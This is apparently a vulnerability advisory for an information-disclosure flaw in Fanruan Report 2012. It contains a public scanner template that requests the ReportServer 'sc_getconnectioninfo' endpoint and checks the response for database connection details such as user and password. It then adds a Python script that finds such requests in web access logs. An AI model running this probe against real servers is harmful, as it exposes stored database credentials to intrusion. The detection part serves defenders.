fanruanoa2012-disclosure: Fanruan Report 2012 Information Disclosure

Date: 2025-08-01 | Affected software: Fanruan Report 2012 | PoC: public

Vulnerability description

Fanruan Report 2012 has an information disclosure vulnerability: some sensitive information can be obtained by accessing a specific URL.

PoC code [public]

id: fanruanoa2012-disclosure

info:
  name: Fanruan Report 2012 Information Disclosure
  author: YanYun
  severity: high
  description: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
  metadata:
    max-request: 2
  tags: oa,java,fanruan,disclosure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
      - "{{BaseURL}}/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"connection"'
          - '"name"'
          - '"driver"'
          - '"password"'
          - '"url"'
          - '"user"'
        condition: and

      - type: word
        words:
          - "application/json"
        part: header
# digest: 4a0a0047304502204cef45eee84aed3b4efc76d963e3a018449d928fba58ea9f3c616c648b3c8d79022100cc3cb210ee3e2f1a5902c6149606d2dfadcc900a3ae1ce8ac93bd158e476d6cb:922c64590222798bb761d5b6d8e72950
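
To find requests like the ones this template sends in your own web access logs, the following added example (not part of the original template or its reference) scans log lines for the two parameters the template uses. It assumes Combined Log Format; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format (assumed): ip - - [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def classify(line):
    """Return None for unrelated lines, else a finding dict for one request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # Both template paths end in /ReportServer; compared case-insensitively
    # as a conservative assumption so near variants are not missed.
    if not parts.path.rstrip("/").lower().endswith("/reportserver"):
        return None
    # parse_qs percent-decodes, so the match is on the normalized parameters
    # regardless of their order or encoding in the raw log line.
    qs = {k.lower(): [v.lower() for v in vs]
          for k, vs in parse_qs(parts.query).items()}
    if "fr_server" not in qs.get("op", []):
        return None
    if "sc_getconnectioninfo" not in qs.get("cmd", []):
        return None
    # Status 200 is the template's first matcher. Access logs carry no body,
    # so a 200 is only "likely" exposure and needs a follow-up review.
    status = int(m["status"])
    severity = "likely-exposed" if status == 200 else "probe"
    return {"ip": m["ip"], "time": m["time"], "path": parts.path,
            "status": status, "severity": severity}

def scan(lines):
    """Return findings for every matching line, in input order."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [01/Aug/2025:10:00:01 +0000] "GET /WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Aug/2025:10:00:02 +0000] "GET /ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1" 404 153',
    '203.0.113.9 - - [01/Aug/2025:10:05:00 +0000] "GET /ReportServer?cmd=sc%5Fgetconnectioninfo&op=FR_SERVER HTTP/1.1" 403 0',
    '192.0.2.4 - - [01/Aug/2025:10:06:00 +0000] "GET /WebReport/ReportServer?op=fr_login HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A "likely-exposed" finding means the endpoint answered with 200; treat any database credentials configured in that report server as disclosed until the response has been reviewed.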
